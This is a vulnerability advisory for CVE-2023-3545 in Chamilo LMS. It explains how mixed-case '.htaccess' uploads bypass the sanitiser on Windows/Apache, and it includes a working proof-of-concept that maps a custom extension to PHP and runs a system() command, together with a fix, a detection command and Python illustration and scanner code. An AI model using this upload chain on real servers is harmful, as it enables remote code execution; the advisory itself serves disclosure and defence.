Summary
Product | Chamilo |
---|---|
Vendor | Chamilo |
Severity | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution. |
Affected Versions | <= v1.11.20 |
Tested Versions | v1.11.20 (latest version as of writing) |
CVE Identifier | CVE-2023-3545 |
CVE Description | Improper sanitisation in main/inc/lib/fileUpload.lib.php in Chamilo LMS <= v1.11.20 on Windows and Apache installations allows unauthenticated attackers to bypass file upload security protections and obtain remote code execution via uploading of .htaccess file. This vulnerability may be exploited by privileged attackers or chained with unauthenticated arbitrary file write vulnerabilities, such as CVE-2023-3533, to achieve remote code execution. |
CWE Classification(s) | CWE-178: Improper Handling of Case Sensitivity |
CAPEC Classification(s) | CAPEC-650: Upload a Web Shell to a Web Server |
CVSS3.1 Scoring System
Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:N/C:H/I:H/A:H
Metric | Value |
---|---|
Attack Vector (AV) | Network |
Attack Complexity (AC) | Low |
Privileges Required (PR) | None |
User Interaction (UI) | None |
Scope (S) | Unchanged |
Confidentiality (C) | High |
Integrity (I) | High |
Availability (A) | High |
Product Overview
Chamilo is an open-source PHP-based Learning Management System (LMS) that facilitates online education and training. It offers features such as course creation, content management, assessments, collaboration and delivering educational resources.
Vulnerability Summary
The `htaccess2txt()` function in `main/inc/lib/fileUpload.lib.php` does not correctly prevent uploading of valid `.htaccess` files on Windows systems. Consequently, an unauthenticated attacker can chain this vulnerability with an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution.
Vulnerability Details
The relevant vulnerable code in `main/inc/lib/fileUpload.lib.php` is shown below:

```php
function htaccess2txt($filename)
{
    // str_replace() is case-sensitive: only these two literal spellings are renamed.
    return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
}
```
Observe that the replacement of `.htaccess` and `.HTACCESS` is performed case-sensitively. By default, filenames on Windows systems are case-insensitive. As such, any capitalised variant of `.htaccess` is treated as a valid `.htaccess` file.

Some examples of valid `.htaccess` files:

- `.Htaccess`
- `.HTaccess`
- `.htAccess`
Consequently, an authenticated attacker with Trainer role can exploit this vulnerability to obtain remote code execution.
A trainer can upload a valid `.htaccess` file containing an `AddType` directive that instructs Apache to treat a chosen file extension as a PHP script:

```apache
AddType application/x-httpd-php .1337
```

Then, upload a PHP file with the `.1337` extension and visit `http(s)://<chamilo>/app/courses/<course_id>/document/<filename>` to execute the uploaded file as a PHP script.
However, the maximum impact is unauthenticated remote code execution on Windows with Apache installations, as this vulnerability may also be chained with CVE-2023-3533 (unauthenticated arbitrary file write).
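The following Python model, added here as an illustration and not taken from Chamilo's code base, re-creates the two sanitisation strategies side by side: `htaccess2txt_vulnerable()` mirrors the original case-sensitive `str_replace()` call, and `htaccess2txt_fixed()` mirrors the case-insensitive `str_ireplace()` approach from the Suggested Mitigations below. `apache_honours_as_htaccess()` is an assumed simplification of Apache's per-directory config lookup (default `AccessFileName .htaccess`): on a case-insensitive filesystem any case variant of the stored name is opened, on a case-sensitive one only the exact name. Running both sanitisers over the sample names from the list above shows why the bug is Windows-specific (CWE-178) and how the fix closes it.

```python
import re

SAMPLE_UPLOAD_NAMES = [  # constructed sample filenames, including the variants listed above
    ".htaccess", ".HTACCESS", ".Htaccess", ".HTaccess", ".htAccess", "notes.txt",
]


def htaccess2txt_vulnerable(filename: str) -> str:
    """Mirror of the original str_replace() call: only two literal spellings are renamed."""
    for literal in (".htaccess", ".HTACCESS"):
        filename = filename.replace(literal, "htaccess.txt")
    return filename


def htaccess2txt_fixed(filename: str) -> str:
    """Mirror of str_ireplace(): the same substring replacement, matched case-insensitively."""
    return re.sub(re.escape(".htaccess"), "htaccess.txt", filename, flags=re.IGNORECASE)


def apache_honours_as_htaccess(stored_name: str, case_insensitive_fs: bool) -> bool:
    """Assumed model of Apache opening its access file (AccessFileName defaults to '.htaccess').

    On a case-insensitive filesystem (NTFS on Windows by default) the lookup for
    '.htaccess' succeeds for any case variant of the stored name; on a
    case-sensitive filesystem (typical Linux) only the exact spelling is found.
    """
    if case_insensitive_fs:
        return stored_name.lower() == ".htaccess"
    return stored_name == ".htaccess"


def names_that_survive(sanitiser, case_insensitive_fs: bool, uploads=SAMPLE_UPLOAD_NAMES):
    """Push each upload name through the sanitiser and report those that would
    still be honoured by Apache as a live access file after being stored."""
    return [
        name for name in uploads
        if apache_honours_as_htaccess(sanitiser(name), case_insensitive_fs)
    ]


if __name__ == "__main__":
    for label, sanitiser in (("vulnerable", htaccess2txt_vulnerable), ("fixed", htaccess2txt_fixed)):
        for fs_label, ci in (("Windows (case-insensitive)", True), ("Linux (case-sensitive)", False)):
            print(f"{label:10s} on {fs_label}: {names_that_survive(sanitiser, ci)}")
```

The vulnerable sanitiser on a case-insensitive filesystem lets every mixed-case spelling through while neutralising only the two exact ones; on a case-sensitive filesystem the same mis-cased names are harmless, which is why the original code went unnoticed on Linux deployments. `str.lower()` folds the full Unicode range whereas PHP's `str_ireplace()` folds ASCII only; for the ASCII variants discussed here the two agree.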
Exploit Conditions
For remote code execution to be possible, the following conditions must be satisfied:

- The target must be running on a Windows system.
- The target must be using the Apache web server (to allow `.htaccess` processing).
An unauthenticated attacker may chain an unauthenticated arbitrary file write vulnerability, such as CVE-2023-3533, to achieve remote code execution. Alternatively, an authenticated attacker with Trainer role or above may exploit the vulnerability without chaining with other vulnerabilities.
Proof-of-Concept
The following proof-of-concept demonstrates how the vulnerability in this report can be exploited by an authenticated attacker with Trainer role.

- Log in to an account with Trainer role.
- Create a new course named `TESTCOURSE`.
- Navigate to `http://<chamilo>/main/document/upload.php?cidReq=TESTCOURSE`.
- Upload a file named `.htAccess` with the following file contents:

```apache
AddType application/x-httpd-php .1337
```

- Upload a file named `rce.1337` with the following file contents:

```php
<?php system("type C:\\Windows\\win.ini"); ?>
```

- Navigate to `http://<chamilo>/app/courses/TESTCOURSE/document/rce.1337`. Observe that the contents of `C:\Windows\win.ini` are returned, indicating that the attacker has successfully achieved remote code execution:

```
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
Suggested Mitigations
Ensure that the renaming of `.htaccess` to `htaccess.txt` is performed case-insensitively. For example:
function htaccess2txt($filename)
{
- return str_replace(['.htaccess', '.HTACCESS'], ['htaccess.txt', 'htaccess.txt'], $filename);
+ return str_ireplace('.htaccess', 'htaccess.txt', $filename);
}
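Review bot: the `+` line is a correct fix for this CWE-178 issue, since `str_ireplace()` matches every ASCII case variant of `.htaccess` (so the `.HTACCESS` spelling dropped from the `-` line remains covered), but nothing in the hunk records why case-insensitive matching is required; add a short comment such as `// Windows filesystems are case-insensitive, so .htAccess is a live .htaccess` above the `return`, otherwise a later reader comparing the two lines may see the change as cosmetic and revert it. Note also that, exactly as in the removed line, the replacement applies to the substring anywhere in `$filename`, so the fix is a rename only and still depends on every upload path calling `htaccess2txt()`; that assumption is worth stating in the same comment.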
End users are encouraged to update to the latest version of Chamilo.
Detection Guidance
It is possible to detect exploitation of this vulnerability by checking the web root and its subdirectories for suspicious `.htaccess` files, i.e. files whose name matches `.htaccess` case-insensitively but is spelled neither `.htaccess` nor `.HTACCESS`.

For example, the following command can be used on UNIX-based systems:

```shell
$ find . \( -iname '.htaccess' -a -not -name '.htaccess' -a -not -name '.HTACCESS' \)
```
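Because the affected deployments run on Windows, where `find(1)` is usually not available, the following Python scanner is added here as a portable equivalent; it is not part of the advisory's original tooling. `find_miscased_htaccess()` implements the same predicate as the `find` command above, and `php_handler_lines()` additionally reports directives inside each flagged file that map something to a PHP handler, since the PoC above plants an `AddType application/x-httpd-php` line. Matching `AddHandler` and `SetHandler` alongside `AddType` is an assumption drawn from Apache's directive set, not from the page. `build_sample_tree()` creates a constructed web root in a temporary directory solely so the scan can be run offline.

```python
import os
import re
import tempfile
from pathlib import Path

ACCESS_FILE = ".htaccess"
# Spellings the original sanitiser already neutralises; any other name that
# case-folds to .htaccess is suspicious (same predicate as the find(1) one-liner).
KNOWN_SPELLINGS = {".htaccess", ".HTACCESS"}
# Assumed set of Apache directives that can hand a file to a PHP handler.
PHP_HANDLER_RE = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\b.*php", re.IGNORECASE)


def find_miscased_htaccess(web_root):
    """Return POSIX-style paths, relative to web_root, of mis-cased access files."""
    root = Path(web_root)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == ACCESS_FILE and name not in KNOWN_SPELLINGS:
                hits.append(Path(dirpath, name).relative_to(root).as_posix())
    return sorted(hits)


def php_handler_lines(path):
    """Return the stripped directive lines in an access file that reference a PHP handler."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.strip() for line in fh if PHP_HANDLER_RE.match(line)]


def scan(web_root):
    """Map each mis-cased access file to the PHP handler directives it contains (possibly none)."""
    return {rel: php_handler_lines(Path(web_root, rel)) for rel in find_miscased_htaccess(web_root)}


def build_sample_tree():
    """Constructed sample web root (not a real deployment) for exercising the scan."""
    root = tempfile.mkdtemp(prefix="chamilo-scan-")
    course = Path(root, "app", "courses", "TESTCOURSE", "document")
    course.mkdir(parents=True)
    # Legitimately spelled access file at the web root: must not be flagged.
    Path(root, ".htaccess").write_text("Options -Indexes\n")
    # Mixed-case name that is not an access file: must not be flagged.
    Path(course, "Notes.TXT").write_text("hello\n")
    # Mis-cased access file carrying the PHP handler mapping from the PoC.
    Path(course, ".htAccess").write_text("AddType application/x-httpd-php .1337\n")
    # Mis-cased access file with only a harmless directive: flagged, no handler lines.
    Path(root, "app", ".Htaccess").write_text("Options -Indexes\n")
    return root


if __name__ == "__main__":
    for rel, directives in scan(build_sample_tree()).items():
        print(f"{rel}: {directives or 'no PHP handler directives'}")
```

Any hit at all is worth investigating, because the original code never produces a mis-cased access file on its own; a hit whose directive list is non-empty indicates that the upload has already been weaponised and the directory should be checked for files with the mapped extension.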
Credits
Ngo Wei Lin (@Creastery) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Timeline
- 2023-07-13 Vendor Disclosure
- 2023-07-14 Initial Vendor Contact
- 2023-07-17 Mutual agreement to delay the publication of vulnerability details was reached in light of the recent in-the-wild exploitation of a Chamilo N-day vulnerability (CVE-2023-34960)
- 2023-07-18 Vendor published the vulnerability summary
- 2023-08-03 Vendor Patch Release (v1.11.22) completely fixing vulnerability
- 2023-11-28 Public Disclosure